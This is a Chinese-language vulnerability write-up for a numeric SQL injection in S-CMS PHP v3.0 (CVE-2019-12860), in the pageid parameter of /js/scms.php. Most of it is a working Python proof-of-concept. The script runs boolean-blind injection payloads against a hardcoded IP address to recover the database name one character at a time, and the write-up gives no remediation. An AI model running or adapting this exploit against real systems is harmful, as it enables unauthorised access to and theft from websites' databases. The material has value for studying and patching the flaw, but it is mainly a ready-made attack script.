### 漏洞简介
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
——–|——–|———|——–|——-|—-|——|
|S-CMS PHP v3.0存在SQL注入漏洞|2019-05-31|zhhhy|[https://www.s-cms.cn/download.html?code=php](/static/baige/01-CMS漏洞/SCMS/https://www.s-cms.cn/download.html?code=php) | [https://www.s-cms.cn/download.html?code=php](/static/baige/01-CMS漏洞/SCMS/https://www.s-cms.cn/download.html?code=php) |PHP v3.0| [CVE-2019-12860](/static/baige/01-CMS漏洞/SCMS/http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12860)|
#### 漏洞概述
> 漏洞代码位置:/js/scms.php 第182-204行,在第83行处,变量$pageid接受使用POST方式传递的pageid的值。而在第87行和第95行处,变量$pageid被直接拼接进SQL语句之中,从而产生注入。而由于是数字型注入,避免使用单引号等符号以至于绕过了防御。
### POC实现代码如下:
> 构造如下poc.py
“` python
import requests
import urllib.parse
chars = ‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_0123456789′
url=’http://106.14.144.32:2000/js/scms.php’
def getDatabaseLength():
print(‘开始爆破数据库长度。。。’)
for i in range(10):
payload=”1%0Aand%0Aif(length(database())>{},1,0)#”.format(i)
payload=urllib.parse.unquote(payload)
data = {
‘action’:’jssdk’,
‘pagetype’:’text’,
‘pageid’:payload
}
# print(data)
# data = urllib.parse.unquote(data)
# print(data)
rs = requests.post(url=url,data=data)
rs.encode=’utf-8′
# print(rs.text)
if “20151019102732946.jpg” not in rs.text:
print(“数据库名的长度为:{}”.format(i))
return i
def getDatabaseName():
print(‘开始获取数据库名’)
databasename = ”
length = getDatabaseLength()
# length = 4
for i in range(1,length+1):
for c in chars:
payload=’1%0Aand%0Aif(ascii(substr(database(),{},1))={},1,0)#’.format(i,ord(c))
# print(payload)
payload = urllib.parse.unquote(payload)
data = {
‘action’: ‘jssdk’,
‘pagetype’: ‘text’,
‘pageid’: payload
}
rs = requests.post(url=url, data=data)
rs.encode = ‘utf-8’
# print(rs.text)
if “20151019102732946.jpg” in rs.text:
databasename = databasename+c
print(databasename)
return databasename
getDatabaseName()
“`
请登录后查看评论内容